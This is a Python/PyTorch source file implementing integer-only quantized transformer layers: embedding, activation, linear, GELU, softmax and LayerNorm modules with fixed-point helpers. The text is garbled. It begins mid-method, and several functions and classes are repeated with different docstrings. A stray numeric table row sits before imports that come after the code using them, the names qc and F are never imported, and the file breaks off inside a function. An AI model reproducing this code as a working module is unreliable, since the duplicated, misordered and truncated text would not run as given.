    def forward(self, x, scaling_factor=None):
        """Return ``(normalized x, scaling factor)``; the factor is None in float mode."""
        if not self.quant_mode:
            mean = x.mean(axis=2, keepdim=True)
            y = x - mean
            var = torch.mean(y**2, axis=2, keepdim=True)
            x = y / torch.sqrt(self.eps + var)
            x = x * self.weight + self.bias
            return x, None

        # compute sqrt of the feature dimension if it is the first run
        if self.dim_sqrt is None:
            n = torch.tensor(x.shape[2], dtype=torch.float)
            self.dim_sqrt = torch.sqrt(n).to(x.device)

        # Normalization: computes mean and variance(std)
        x_int = x / scaling_factor
        mean_int = round_ste.apply(x_int.mean(axis=2, keepdim=True))
        y_int = x_int - mean_int
        y_int_shifted = floor_ste.apply(y_int / 2**self.shift)
        y_sq_int = y_int_shifted**2
        var_int = torch.sum(y_sq_int, axis=2, keepdim=True)

        # overflow handling in training time
        if self.training:
            # if overflow is detected
            if var_int.max() >= 2**self.max_bit:
                var_int = self.overflow_fallback(y_int)
                assert var_int.max() < 2**self.max_bit + 0.1, (
                    "Error detected in overflow handling: "
                    "`var_int` exceeds `self.max_bit` (the maximum possible bit width)"
                )

        # To be replaced with integer-sqrt kernel that produces the same output
        std_int = floor_ste.apply(torch.sqrt(var_int)) * 2**self.shift
        factor = floor_ste.apply(2**31 / std_int)
        y_int = floor_ste.apply(y_int * factor / 2)
        scaling_factor = self.dim_sqrt / 2**30

        # scaling and shifting
        bias = self.bias.data.detach() / (self.weight.data.detach())
        bias_int = floor_ste.apply(bias / scaling_factor)

        y_int = y_int + bias_int
        scaling_factor = scaling_factor * self.weight
        x = y_int * scaling_factor

        return x, scaling_factor
def get_percentile_min_max(input, lower_percentile, upper_percentile, output_tensor=False):
    """Return the (lower, upper) percentile bounds of a 1-d tensor.

    ``lower_percentile``/``upper_percentile`` are given in percent (0-100).
    A lower percentile of 0 yields a zero lower bound.  Results are Python
    floats unless ``output_tensor`` is True.
    """
    length = input.shape[0]
    k_lower = round(length * (1 - lower_percentile * 0.01))
    k_upper = round(length * upper_percentile * 0.01)

    upper_bound = torch.kthvalue(input, k=k_upper).values
    if lower_percentile == 0:
        lower_bound = upper_bound * 0
    else:
        # kth smallest of the negated input == kth largest of the input, negated.
        lower_bound = -torch.kthvalue(-input, k=k_lower).values

    if output_tensor:
        return lower_bound, upper_bound
    return lower_bound.item(), upper_bound.item()
def linear_quantize(input, scale, zero_point, inplace=False):
    """Quantize ``input``: q = round(input / scale + zero_point).

    ``scale`` and ``zero_point`` are reshaped for broadcasting based on the
    input rank (4-d conv weights, 2-d linear weights, or flat otherwise).
    With ``inplace=True`` the input tensor is modified and returned.
    """
    rank = len(input.shape)
    if rank == 4:
        view_shape = (-1, 1, 1, 1)
    elif rank == 2:
        # reshape scale and zeropoint for linear weights
        view_shape = (-1, 1)
    else:
        view_shape = (-1,)
    scale = scale.view(view_shape)
    zero_point = zero_point.view(view_shape)

    # quantized = float / scale + zero_point
    if inplace:
        input.mul_(1.0 / scale).add_(zero_point).round_()
        return input
    return torch.round(1.0 / scale * input + zero_point)
def symmetric_linear_quantization_params(
    num_bits, saturation_min, saturation_max, per_channel=False
):
    """Compute the symmetric quantization scale for the given saturation range.

    The scale is max(|min|, |max|) / (2**(num_bits-1) - 1), clamped away from
    zero; per-channel mode computes it elementwise across channels.
    No gradients flow through this computation.
    """
    with torch.no_grad():
        n = 2 ** (num_bits - 1) - 1

        if per_channel:
            # Elementwise max of |min| and |max| per channel.
            scale, _ = torch.max(
                torch.stack([saturation_min.abs(), saturation_max.abs()], dim=1), dim=1
            )
        else:
            scale = max(saturation_min.abs(), saturation_max.abs())

        return torch.clamp(scale, min=1e-8) / n
class SymmetricQuantFunction(Function):
    """Symmetric k-bit quantization with a rescaled straight-through backward.

    forward: q = clamp(round(x / scale), -n, n - 1) with n = 2**(k-1) - 1.
    backward: the gradient is divided by ``scale``; no gradient flows to the
    other forward arguments.
    """

    @staticmethod
    def forward(ctx, x, k, percentile_mode, scale):
        ctx.scale = scale
        n = 2 ** (k - 1) - 1
        # Symmetric quantization uses a zero offset.
        zero_point = torch.tensor(0.0).to(scale.device)
        q = linear_quantize(x, scale, zero_point, inplace=False)
        return torch.clamp(q, -n, n - 1)

    @staticmethod
    def backward(ctx, grad_output):
        scale = ctx.scale
        rank = len(grad_output.shape)
        if rank == 4:
            scale = scale.view(-1, 1, 1, 1)
        elif rank == 2:
            # reshape scale and zeropoint for linear weights
            scale = scale.view(-1, 1)
        else:
            scale = scale.view(-1)
        return grad_output.clone() / scale, None, None, None, None
class floor_ste(Function):
    """torch.floor with a straight-through (identity) gradient."""

    @staticmethod
    def forward(ctx, x):
        return x.floor()

    @staticmethod
    def backward(ctx, grad_output):
        # Straight-through estimator: pass the gradient unchanged.
        return grad_output.clone()
class round_ste(Function):
    """torch.round with a straight-through (identity) gradient."""

    @staticmethod
    def forward(ctx, x):
        return x.round()

    @staticmethod
    def backward(ctx, grad_output):
        # Straight-through estimator: pass the gradient unchanged.
        return grad_output.clone()
def batch_frexp(inputs, max_bit=31):
    """Decompose each element into (integer mantissa, exponent).

    Each value v is written as m * 2**(-e) where m is a ``max_bit``-bit
    integer obtained from numpy's frexp mantissa with half-up rounding.
    Returns two tensors shaped like ``inputs`` on the same device.
    """
    original_shape = inputs.size()
    flat = inputs.view(-1)

    mantissa, exponent = np.frexp(flat.cpu().numpy())

    # Scale mantissas (in [0.5, 1)) up to max_bit-bit integers, rounding
    # half-up via decimal to match fixed-point hardware behavior.
    one = decimal.Decimal("1")
    mantissa = np.array(
        [
            int(decimal.Decimal(m * (2**max_bit)).quantize(one, rounding=decimal.ROUND_HALF_UP))
            for m in mantissa
        ]
    )
    exponent = float(max_bit) - exponent

    return (
        torch.from_numpy(mantissa).to(inputs.device).view(original_shape),
        torch.from_numpy(exponent).to(inputs.device).view(original_shape),
    )
class FixedPointMul(Function):
    """Re-quantize a pre-activation from its scale to a target scale using
    fixed-point (mantissa, exponent) multiplication, optionally fusing a
    residual ``identity`` quantized with its own scale.

    The output is clamped to the signed ``bit_num``-bit range.  backward
    divides incoming gradients by the target scale (gradients flow only to
    ``pre_act`` and, if given, ``identity``).
    """

    @staticmethod
    def forward(
        ctx,
        pre_act,
        pre_act_scaling_factor,
        bit_num,
        z_scaling_factor,
        identity=None,
        identity_scaling_factor=None,
    ):
        # 3-d scaling factors are used as-is; otherwise broadcast over (1, 1, C).
        if len(pre_act_scaling_factor.shape) == 3:
            reshape = lambda x: x  # noqa: E731
        else:
            reshape = lambda x: x.view(1, 1, -1)  # noqa: E731
        ctx.identity = identity

        n = 2 ** (bit_num - 1) - 1

        with torch.no_grad():
            pre_act_scaling_factor = reshape(pre_act_scaling_factor)
            if identity is not None:
                identity_scaling_factor = reshape(identity_scaling_factor)

            ctx.z_scaling_factor = z_scaling_factor

            # Integer value of the pre-activation in its own scale.
            z_int = torch.round(pre_act / pre_act_scaling_factor)
            _A = pre_act_scaling_factor.type(torch.double)
            _B = (z_scaling_factor.type(torch.float)).type(torch.double)
            new_scale = _A / _B
            new_scale = reshape(new_scale)

            # Fixed-point rescale: multiply by mantissa, shift by exponent.
            m, e = batch_frexp(new_scale)

            output = z_int.type(torch.double) * m.type(torch.double)
            output = torch.round(output / (2.0**e))

            if identity is not None:
                # needs addition of identity activation
                wx_int = torch.round(identity / identity_scaling_factor)

                _A = identity_scaling_factor.type(torch.double)
                _B = (z_scaling_factor.type(torch.float)).type(torch.double)
                new_scale = _A / _B
                new_scale = reshape(new_scale)

                m1, e1 = batch_frexp(new_scale)
                output1 = wx_int.type(torch.double) * m1.type(torch.double)
                output1 = torch.round(output1 / (2.0**e1))

                output = output1 + output

            return torch.clamp(output.type(torch.float), -n - 1, n)

    @staticmethod
    def backward(ctx, grad_output):
        identity_grad = None
        if ctx.identity is not None:
            identity_grad = grad_output.clone() / ctx.z_scaling_factor
        # Gradients for: pre_act, pre_act_scaling_factor, bit_num,
        # z_scaling_factor, (unused), identity, identity_scaling_factor.
        return (
            grad_output.clone() / ctx.z_scaling_factor,
            None,
            None,
            None,
            None,
            identity_grad,
            None,
        )
| 33.934848 | 105 | 0.603831 | import decimal
import numpy as np
import torch
from torch import nn
from torch.autograd import Function
from ...utils import logging
logger = logging.get_logger(__name__)
class QuantEmbedding(qc.Module):
    """Quantization-aware embedding lookup.

    Float mode returns ``(F.embedding(x), None)``; quant mode symmetrically
    quantizes the weight to ``weight_bit`` bits and returns the dequantized
    lookup with its scaling factor.

    NOTE(review): ``qc`` is not imported in this chunk — presumably the
    project's core module providing a Module base class; confirm.
    """

    def __init__(
        self,
        num_embeddings,
        embedding_dim,
        padding_idx=None,
        max_norm=None,
        norm_type=2.0,
        scale_grad_by_freq=False,
        sparse=False,
        _weight=None,
        weight_bit=8,
        momentum=0.95,
        quant_mode=False,
    ):
        super().__init__()
        self.num_ = num_embeddings
        self.dim = embedding_dim
        # Plain nn.Embedding options, forwarded verbatim to F.embedding.
        self.padding_idx = padding_idx
        self.max_norm = max_norm
        self.norm_type = norm_type
        self.scale_grad_by_freq = scale_grad_by_freq
        self.sparse = sparse

        self.weight = nn.Parameter(torch.zeros([num_embeddings, embedding_dim]))
        # Quantization state, refreshed on every quantized forward pass.
        self.register_buffer("weight_scaling_factor", torch.zeros(1))
        self.register_buffer("weight_integer", torch.zeros_like(self.weight))

        self.weight_bit = weight_bit
        self.momentum = momentum  # NOTE(review): stored but unused in this chunk
        self.quant_mode = quant_mode
        self.percentile_mode = False
        self.weight_function = SymmetricQuantFunction.apply

    def forward(self, x, positions=None, incremental_state=None):
        """Return ``(embeddings, scaling_factor)``; ``positions`` and
        ``incremental_state`` are accepted but unused."""
        if not self.quant_mode:
            return (
                F.embedding(
                    x,
                    self.weight,
                    self.padding_idx,
                    self.max_norm,
                    self.norm_type,
                    self.scale_grad_by_freq,
                    self.sparse,
                ),
                None,
            )

        # Symmetric per-tensor range of the weight.
        w = self.weight
        w_transform = w.data.detach()
        w_min = w_transform.min().expand(1)
        w_max = w_transform.max().expand(1)

        self.weight_scaling_factor = symmetric_linear_quantization_params(
            self.weight_bit, w_min, w_max, False
        )
        self.weight_integer = self.weight_function(
            self.weight, self.weight_bit, self.percentile_mode, self.weight_scaling_factor
        )

        emb_int = F.embedding(
            x,
            self.weight_integer,
            self.padding_idx,
            self.max_norm,
            self.norm_type,
            self.scale_grad_by_freq,
            self.sparse,
        )
        return emb_int * self.weight_scaling_factor, self.weight_scaling_factor
class QuantAct(qc.Module):
    """Tracks activation ranges and (fake-)quantizes activations.

    While training, an exponential moving average of the activation min/max
    is maintained.  In quant mode the forward pass returns the quantized
    activation together with its scaling factor; in float mode it returns
    the activation unchanged and ``None``.
    """

    def __init__(
        self,
        activation_bit,
        act_range_momentum=0.95,
        per_channel=False,
        channel_len=None,
        quant_mode=False,
    ):
        super().__init__()
        self.activation_bit = activation_bit
        self.act_range_momentum = act_range_momentum
        self.quant_mode = quant_mode
        self.per_channel = per_channel
        self.percentile = False
        self.act_function = SymmetricQuantFunction.apply

        if not self.per_channel:
            self.register_buffer("x_min", torch.zeros(1))
            self.register_buffer("x_max", torch.zeros(1))
            self.register_buffer("act_scaling_factor", torch.zeros(1))
            # Nudge the initial range off exactly zero so the
            # "uninitialized" check in forward() can detect first use.
            self.x_min -= 1e-5
            self.x_max += 1e-5
        else:
            raise NotImplementedError("per-channel mode is not currently supported for activation.")

    def __repr__(self):
        # Bug fix: the original interpolated `self.activation_bit` a second
        # time for the quant_mode field; report the actual quant_mode.
        return (
            f"{self.__class__.__name__}(activation_bit={self.activation_bit}, "
            f"quant_mode: {self.quant_mode}, Act_min: {self.x_min.item():.2f}, "
            f"Act_max: {self.x_max.item():.2f})"
        )

    def forward(
        self,
        x,
        pre_act_scaling_factor=None,
        identity=None,
        identity_scaling_factor=None,
        specified_min=None,
        specified_max=None,
    ):
        """Quantize ``x`` (optionally fused with a residual ``identity``).

        Returns ``(quantized activation, scaling factor)``; the factor is
        None in float mode.
        """
        x_act = x if identity is None else identity + x
        # Collect running min/max statistics while training.
        if self.training:
            assert not self.percentile, "percentile mode is not currently supported for activation."
            assert (
                not self.per_channel
            ), "per-channel mode is not currently supported for activation."
            x_min = x_act.data.min()
            x_max = x_act.data.max()

            assert (
                x_max.isnan().sum() == 0 and x_min.isnan().sum() == 0
            ), "NaN detected when computing min/max of the activation"

            # Initialization: range still at its epsilon starting values.
            if self.x_min.min() > -1.1e-5 and self.x_max.max() < 1.1e-5:
                self.x_min = self.x_min + x_min
                self.x_max = self.x_max + x_max
            # act_range_momentum == -1 means plain running min/max.
            elif self.act_range_momentum == -1:
                self.x_min = torch.min(self.x_min, x_min)
                self.x_max = torch.max(self.x_max, x_max)
            else:
                # Exponential moving average of the range.
                self.x_min = self.x_min * self.act_range_momentum + x_min * (
                    1 - self.act_range_momentum
                )
                self.x_max = self.x_max * self.act_range_momentum + x_max * (
                    1 - self.act_range_momentum
                )

        if not self.quant_mode:
            return x_act, None

        x_min = self.x_min if specified_min is None else specified_min
        x_max = self.x_max if specified_max is None else specified_max

        self.act_scaling_factor = symmetric_linear_quantization_params(
            self.activation_bit, x_min, x_max, per_channel=self.per_channel
        )

        if pre_act_scaling_factor is None:
            # Input quantization from float.
            quant_act_int = self.act_function(
                x, self.activation_bit, self.percentile, self.act_scaling_factor
            )
        else:
            # Re-quantize from the previous scale (and fuse the residual).
            quant_act_int = FixedPointMul.apply(
                x,
                pre_act_scaling_factor,
                self.activation_bit,
                self.act_scaling_factor,
                identity,
                identity_scaling_factor,
            )

        correct_output_scale = self.act_scaling_factor.view(-1)

        return quant_act_int * correct_output_scale, self.act_scaling_factor
class QuantLinear(qc.Module):
    """Quantization-aware drop-in for ``nn.Linear``.

    Float mode returns ``(F.linear(x), None)``.  Quant mode quantizes the
    weight (per-tensor or per-channel) and bias, runs the linear layer on
    integer values and returns ``(output, bias scaling factor)``.
    """

    def __init__(
        self,
        in_features,
        out_features,
        bias=True,
        weight_bit=8,
        bias_bit=32,
        per_channel=False,
        quant_mode=False,
    ):
        super().__init__()
        self.in_features = in_features
        self.out_features = out_features

        self.weight = nn.Parameter(torch.zeros([out_features, in_features]))
        self.register_buffer("weight_integer", torch.zeros_like(self.weight))
        self.register_buffer("fc_scaling_factor", torch.zeros(self.out_features))
        if bias:
            self.bias = nn.Parameter(torch.zeros(out_features))
            self.register_buffer("bias_integer", torch.zeros_like(self.bias))
        else:
            # Bug fix: the original never defined these when bias=False, so
            # forward() raised AttributeError on `self.bias` / `self.bias_integer`.
            self.register_parameter("bias", None)
            self.bias_integer = None

        self.weight_bit = weight_bit
        self.per_channel = per_channel
        self.bias_bit = bias_bit
        self.quant_mode = quant_mode  # (was assigned twice in the original)
        self.percentile_mode = False
        self.weight_function = SymmetricQuantFunction.apply

    def __repr__(self):
        s = super().__repr__()
        s = f"({s} weight_bit={self.weight_bit}, quant_mode={self.quant_mode})"
        return s

    def forward(self, x, prev_act_scaling_factor=None):
        """Return ``(output, bias_scaling_factor)``; the factor is None in
        float mode."""
        if not self.quant_mode:
            return F.linear(x, weight=self.weight, bias=self.bias), None

        # prev_act_scaling_factor must be a 1-element (per-tensor) scale.
        assert prev_act_scaling_factor is not None and prev_act_scaling_factor.shape == (1,), (
            "Input activation to the QuantLinear layer should be globally (non-channel-wise) quantized. "
            "Please add a QuantAct layer with `per_channel = True` before this QuantAct layer"
        )

        # Weight range: per output channel or per tensor.
        w = self.weight
        w_transform = w.data.detach()
        if self.per_channel:
            w_min, _ = torch.min(w_transform, dim=1, out=None)
            w_max, _ = torch.max(w_transform, dim=1, out=None)
        else:
            w_min = w_transform.min().expand(1)
            w_max = w_transform.max().expand(1)

        self.fc_scaling_factor = symmetric_linear_quantization_params(
            self.weight_bit, w_min, w_max, self.per_channel
        )
        self.weight_integer = self.weight_function(
            self.weight, self.weight_bit, self.percentile_mode, self.fc_scaling_factor
        )

        bias_scaling_factor = self.fc_scaling_factor * prev_act_scaling_factor

        if self.bias is not None:
            self.bias_integer = self.weight_function(
                self.bias, self.bias_bit, False, bias_scaling_factor
            )

        prev_act_scaling_factor = prev_act_scaling_factor.view(1, -1)
        x_int = x / prev_act_scaling_factor

        return (
            F.linear(x_int, weight=self.weight_integer, bias=self.bias_integer)
            * bias_scaling_factor,
            bias_scaling_factor,
        )
class IntGELU(qc.Module):
    """GELU built from an integer second-order polynomial approximation of erf.

    Falls back to ``nn.GELU`` when ``quant_mode`` is False or when
    ``force_dequant`` requests dequantized nonlinearities.
    """

    def __init__(self, quant_mode=True, force_dequant="none"):
        super().__init__()
        self.quant_mode = quant_mode
        if force_dequant in ["nonlinear", "gelu"]:
            logger.info("Force dequantize gelu")
            self.quant_mode = False
        if not self.quant_mode:
            self.activation_fn = nn.GELU()

        self.k = 1.4142  # ~sqrt(2), the erf argument scale in gelu
        self.const = 14  # dummy integer constant
        self.coeff = [-0.2888, -1.769, 1]  # a(x+b)**2 + c
        self.coeff[2] /= self.coeff[0]  # fold c into units of a

    def int_erf(self, x_int, scaling_factor):
        """Integer evaluation of sign(x) * (a(|x|+b)**2 + c) approximating erf."""
        b_int = torch.floor(self.coeff[1] / scaling_factor)
        c_int = torch.floor(self.coeff[2] / scaling_factor**2)
        sign = torch.sign(x_int)

        # Saturate |x| at -b, the vertex of the parabola.
        abs_int = torch.min(torch.abs(x_int), -b_int)
        y_int = sign * ((abs_int + b_int) ** 2 + c_int)
        scaling_factor = scaling_factor**2 * self.coeff[0]

        # Shift down to avoid integer overflow.
        y_int = floor_ste.apply(y_int / 2**self.const)
        scaling_factor = scaling_factor * 2**self.const

        return y_int, scaling_factor

    def forward(self, x, scaling_factor=None):
        """Return ``(gelu(x), scaling_factor)``; the factor is None in float mode."""
        if not self.quant_mode:
            return self.activation_fn(x), None

        x_int = x / scaling_factor
        sigmoid_int, sigmoid_scaling_factor = self.int_erf(x_int, scaling_factor / self.k)

        # Integer representation of the +1 term in x/2 * (1 + erf(...)).
        shift_int = 1.0 // sigmoid_scaling_factor

        x_int = x_int * (sigmoid_int + shift_int)
        scaling_factor = scaling_factor * sigmoid_scaling_factor / 2

        return x_int * scaling_factor, scaling_factor
class IntSoftmax(qc.Module):
    """Integer-only softmax via a polynomial approximation of exp.

    ``exp(x)`` is decomposed as ``2**(-q) * exp(r)`` with ``x = q*(-ln2) + r``
    and ``exp(r)`` approximated by a second-order polynomial.  Falls back to
    ``F.softmax`` when ``quant_mode`` is False or ``force_dequant`` applies.
    """

    def __init__(self, output_bit, quant_mode=False, force_dequant="none"):
        super().__init__()
        self.output_bit = output_bit
        self.max_bit = 32
        self.quant_mode = quant_mode
        if force_dequant in ["nonlinear", "softmax"]:
            logger.info("Force dequantize softmax")
            self.quant_mode = False

        self.act = QuantAct(16, quant_mode=self.quant_mode)
        self.x0 = -0.6931  # -ln2
        self.const = 30  # dummy integer constant
        self.coef = [0.35815147, 0.96963238, 1.0]  # ax**2 + bx + c
        self.coef[1] /= self.coef[0]
        self.coef[2] /= self.coef[0]

    def int_polynomial(self, x_int, scaling_factor):
        """Evaluate the quadratic exp approximation on integer inputs."""
        with torch.no_grad():
            b_int = torch.floor(self.coef[1] / scaling_factor)
            c_int = torch.floor(self.coef[2] / scaling_factor**2)
        z = (x_int + b_int) * x_int + c_int
        scaling_factor = self.coef[0] * scaling_factor**2
        return z, scaling_factor

    def int_exp(self, x_int, scaling_factor):
        """Integer approximation of exp for non-positive ``x_int``."""
        with torch.no_grad():
            x0_int = torch.floor(self.x0 / scaling_factor)
        # Clamp the argument so q stays within `const` halvings.
        x_int = torch.max(x_int, self.const * x0_int)

        q = floor_ste.apply(x_int / x0_int)
        r = x_int - x0_int * q
        exp_int, exp_scaling_factor = self.int_polynomial(r, scaling_factor)
        exp_int = torch.clamp(floor_ste.apply(exp_int * 2 ** (self.const - q)), min=0)
        scaling_factor = exp_scaling_factor / 2**self.const
        return exp_int, scaling_factor

    def forward(self, x, scaling_factor):
        """Return ``(softmax(x), output scaling factor)`` along the last dim."""
        if not self.quant_mode:
            return F.softmax(x, dim=-1), None

        x_int = x / scaling_factor

        # Standard max-subtraction for numerical stability.
        x_int_max, _ = x_int.max(dim=-1, keepdim=True)
        x_int = x_int - x_int_max
        exp_int, exp_scaling_factor = self.int_exp(x_int, scaling_factor)

        # Re-quantize the exp outputs to 16 bits to avoid overflow.
        exp, exp_scaling_factor = self.act(exp_int, exp_scaling_factor)
        exp_int = exp / exp_scaling_factor

        exp_int_sum = exp_int.sum(dim=-1, keepdim=True)
        factor = floor_ste.apply(2**self.max_bit / exp_int_sum)
        exp_int = floor_ste.apply(exp_int * factor / 2 ** (self.max_bit - self.output_bit))
        scaling_factor = 1 / 2**self.output_bit
        return exp_int * scaling_factor, scaling_factor
class IntLayerNorm(qc.Module):
    """Integer-only LayerNorm (I-BERT style) over axis 2.

    Maintains a dynamic `shift` buffer so the integer variance accumulation
    stays within `max_bit` bits; falls back to standard LayerNorm when
    quantization is disabled.

    Args:
        normalized_shape: shape of the learned weight/bias parameters.
        eps: epsilon added to the variance in the full-precision path.
        output_bit: bit width of the output activation quantizer.
        quant_mode: if False, use the ordinary floating-point computation.
        force_dequant: "nonlinear" or "layernorm" forces quant_mode off.
    """
    def __init__(self, normalized_shape, eps, output_bit=8, quant_mode=False, force_dequant="none"):
        super().__init__()
        self.normalized_shape = normalized_shape
        self.eps = eps
        self.weight = nn.Parameter(torch.zeros(normalized_shape))
        self.bias = nn.Parameter(torch.zeros(normalized_shape))
        self.quant_mode = quant_mode
        if force_dequant in ["nonlinear", "layernorm"]:
            logger.info("Force dequantize layernorm")
            self.quant_mode = False
        # Dynamic right-shift used to keep the integer variance in range.
        self.register_buffer("shift", torch.zeros(1))
        self.output_bit = output_bit
        self.max_bit = 32
        self.dim_sqrt = None  # sqrt(feature dim), lazily initialized in forward
        self.activation = QuantAct(self.output_bit, quant_mode=self.quant_mode)
    def set_shift(self, y_int):
        """Grow `self.shift` so sum(y_int**2) fits within `max_bit` bits."""
        with torch.no_grad():
            y_sq_int = y_int**2
            var_int = torch.sum(y_sq_int, axis=2, keepdim=True)
            shift = (torch.log2(torch.sqrt(var_int / 2**self.max_bit)).ceil()).max()
            shift_old = self.shift
            # Shift only ever increases (monotone to stay safe for all batches).
            self.shift = torch.max(self.shift, shift)
            logger.info(f"Dynamic shift adjustment: {int(shift_old)} to {int(self.shift)}")
    def overflow_fallback(self, y_int):
        """Recompute the integer variance after enlarging the shift.

        Called when the variance overflowed `max_bit` during training.
        """
        self.set_shift(y_int)
        y_int_shifted = floor_ste.apply(y_int / 2**self.shift)
        y_sq_int = y_int_shifted**2
        var_int = torch.sum(y_sq_int, axis=2, keepdim=True)
        return var_int
    def forward(self, x, scaling_factor=None):
        """Normalize over axis 2; returns (output, scaling_factor)."""
        if not self.quant_mode:
            # Plain floating-point LayerNorm.
            mean = x.mean(axis=2, keepdim=True)
            y = x - mean
            var = torch.mean(y**2, axis=2, keepdim=True)
            x = y / torch.sqrt(self.eps + var)
            x = x * self.weight + self.bias
            return x, None
        if self.dim_sqrt is None:
            # Lazily cache sqrt(n) for the output scaling factor.
            n = torch.tensor(x.shape[2], dtype=torch.float)
            self.dim_sqrt = torch.sqrt(n).to(x.device)
        x_int = x / scaling_factor
        mean_int = round_ste.apply(x_int.mean(axis=2, keepdim=True))
        y_int = x_int - mean_int
        # Pre-shift before squaring so the accumulation fits in max_bit bits.
        y_int_shifted = floor_ste.apply(y_int / 2**self.shift)
        y_sq_int = y_int_shifted**2
        var_int = torch.sum(y_sq_int, axis=2, keepdim=True)
        if self.training:
            # Detect overflow and enlarge the shift on the fly.
            if var_int.max() >= 2**self.max_bit:
                var_int = self.overflow_fallback(y_int)
                assert var_int.max() < 2**self.max_bit + 0.1, (
                    "Error detected in overflow handling: "
                    "`var_int` exceeds `self.max_bit` (the maximum possible bit width)"
                )
        # Undo the pre-shift on the integer std, then divide via a 2**31 factor.
        std_int = floor_ste.apply(torch.sqrt(var_int)) * 2**self.shift
        factor = floor_ste.apply(2**31 / std_int)
        y_int = floor_ste.apply(y_int * factor / 2)
        scaling_factor = self.dim_sqrt / 2**30
        # Fold bias/weight into integer domain: out = weight * (norm + bias/weight).
        bias = self.bias.data.detach() / (self.weight.data.detach())
        bias_int = floor_ste.apply(bias / scaling_factor)
        y_int = y_int + bias_int
        scaling_factor = scaling_factor * self.weight
        x = y_int * scaling_factor
        return x, scaling_factor
def get_percentile_min_max(input, lower_percentile, upper_percentile, output_tensor=False):
    """Return the (lower, upper) percentile bounds of a 1-D tensor.

    Args:
        input: 1-D tensor of values.
        lower_percentile: lower percentile in [0, 100]; 0 yields a zero lower
            bound (skips the extra kthvalue pass).
        upper_percentile: upper percentile in [0, 100].
        output_tensor: if True, return 0-dim tensors; otherwise Python floats.

    Returns:
        Tuple ``(lower_bound, upper_bound)``.
    """
    n = input.shape[0]
    k_upper = round(n * upper_percentile * 0.01)
    upper_bound = torch.kthvalue(input, k=k_upper).values

    if lower_percentile == 0:
        lower_bound = upper_bound * 0
    else:
        # kthvalue on the negated tensor gives the lower-percentile value.
        k_lower = round(n * (1 - lower_percentile * 0.01))
        lower_bound = -torch.kthvalue(-input, k=k_lower).values

    if output_tensor:
        return lower_bound, upper_bound
    return lower_bound.item(), upper_bound.item()
def linear_quantize(input, scale, zero_point, inplace=False):
    """Linearly quantize: round(input / scale + zero_point).

    `scale` and `zero_point` are reshaped per channel according to the input
    rank: 4-D (conv activations) -> (-1,1,1,1), 2-D (linear) -> (-1,1),
    otherwise flattened.

    Args:
        input: tensor to quantize.
        scale: per-channel (or scalar) quantization step.
        zero_point: per-channel (or scalar) offset.
        inplace: if True, mutate `input` and return it.
    """
    rank = len(input.shape)
    if rank == 4:
        view_shape = (-1, 1, 1, 1)
    elif rank == 2:
        view_shape = (-1, 1)
    else:
        view_shape = (-1,)
    scale = scale.view(*view_shape)
    zero_point = zero_point.view(*view_shape)

    if inplace:
        input.mul_(1.0 / scale).add_(zero_point).round_()
        return input
    return torch.round(1.0 / scale * input + zero_point)
def symmetric_linear_quantization_params(
    num_bits, saturation_min, saturation_max, per_channel=False
):
    """Compute the scale for symmetric linear quantization.

    The scale is max(|saturation_min|, |saturation_max|) divided by the
    largest representable magnitude 2**(num_bits-1) - 1, clamped away from
    zero so downstream divisions are safe.

    Args:
        num_bits: target bit width.
        saturation_min: tensor of minimum observed values.
        saturation_max: tensor of maximum observed values.
        per_channel: if True, compute one scale per channel (element-wise).
    """
    # No gradients: the scale is a statistic, not a learned quantity.
    with torch.no_grad():
        n = 2 ** (num_bits - 1) - 1
        if per_channel:
            abs_bounds = torch.stack([saturation_min.abs(), saturation_max.abs()], dim=1)
            largest, _ = torch.max(abs_bounds, dim=1)
        else:
            largest = max(saturation_min.abs(), saturation_max.abs())
        scale = torch.clamp(largest, min=1e-8) / n
    return scale
class SymmetricQuantFunction(Function):
    """Symmetric linear quantizer with a straight-through estimator.

    Forward quantizes `x` to signed k-bit integers using `scale`; backward
    passes the gradient through, divided by the scale.
    """

    @staticmethod
    def forward(ctx, x, k, percentile_mode, scale):
        """Quantize `x` to the signed k-bit integer grid defined by `scale`."""
        zero_point = torch.tensor(0.0).to(scale.device)
        n = 2 ** (k - 1) - 1
        quantized = linear_quantize(x, scale, zero_point, inplace=False)
        quantized = torch.clamp(quantized, -n, n - 1)
        ctx.scale = scale
        return quantized

    @staticmethod
    def backward(ctx, grad_output):
        """Straight-through gradient, rescaled per channel by `scale`."""
        scale = ctx.scale
        rank = len(grad_output.shape)
        if rank == 4:
            scale = scale.view(-1, 1, 1, 1)
        elif rank == 2:
            scale = scale.view(-1, 1)
        else:
            scale = scale.view(-1)
        # Gradients only flow to `x`; the other forward args are non-tensors.
        return grad_output.clone() / scale, None, None, None, None
class floor_ste(Function):
    """Element-wise floor with a straight-through gradient estimator."""

    @staticmethod
    def forward(ctx, x):
        # Non-differentiable floor in the forward pass.
        return x.floor()

    @staticmethod
    def backward(ctx, grad_output):
        # Straight-through: treat floor as the identity for gradients.
        grad = grad_output.clone()
        return grad
class round_ste(Function):
    """Element-wise round with a straight-through gradient estimator."""

    @staticmethod
    def forward(ctx, x):
        # Non-differentiable rounding in the forward pass.
        return x.round()

    @staticmethod
    def backward(ctx, grad_output):
        # Straight-through: treat rounding as the identity for gradients.
        grad = grad_output.clone()
        return grad
def batch_frexp(inputs, max_bit=31):
    """Decompose each element into an integer mantissa and exponent.

    Uses ``np.frexp`` (x = m * 2**e with m in [0.5, 1)), scales the mantissa
    to `max_bit` bits with half-up rounding, and adjusts the exponent so that
    element == mantissa / 2**exponent.

    Args:
        inputs: tensor of values to decompose.
        max_bit: bit width used for the integer mantissa.

    Returns:
        Tuple of tensors ``(mantissa, exponent)`` with the input's shape.
    """
    original_shape = inputs.size()
    flat = inputs.view(-1)

    mantissas, exponents = np.frexp(flat.cpu().numpy())
    # Decimal.quantize with ROUND_HALF_UP gives deterministic half-up rounding
    # (Python's round() would round half to even).
    one = decimal.Decimal("1")
    shifted = [
        int(decimal.Decimal(m * (2**max_bit)).quantize(one, rounding=decimal.ROUND_HALF_UP))
        for m in mantissas
    ]
    output_m = np.array(shifted)
    output_e = float(max_bit) - exponents

    return (
        torch.from_numpy(output_m).to(inputs.device).view(original_shape),
        torch.from_numpy(output_e).to(inputs.device).view(original_shape),
    )
class FixedPointMul(Function):
    """Fixed-point requantization: rescale `pre_act` to `z_scaling_factor`.

    Computes round(pre_act / z_scaling_factor) using only integer multiply
    and shift (via batch_frexp), optionally adding a residual `identity`
    branch rescaled the same way. The result is clamped to `bit_num` bits.
    """
    @staticmethod
    def forward(
        ctx,
        pre_act,
        pre_act_scaling_factor,
        bit_num,
        z_scaling_factor,
        identity=None,
        identity_scaling_factor=None,
    ):
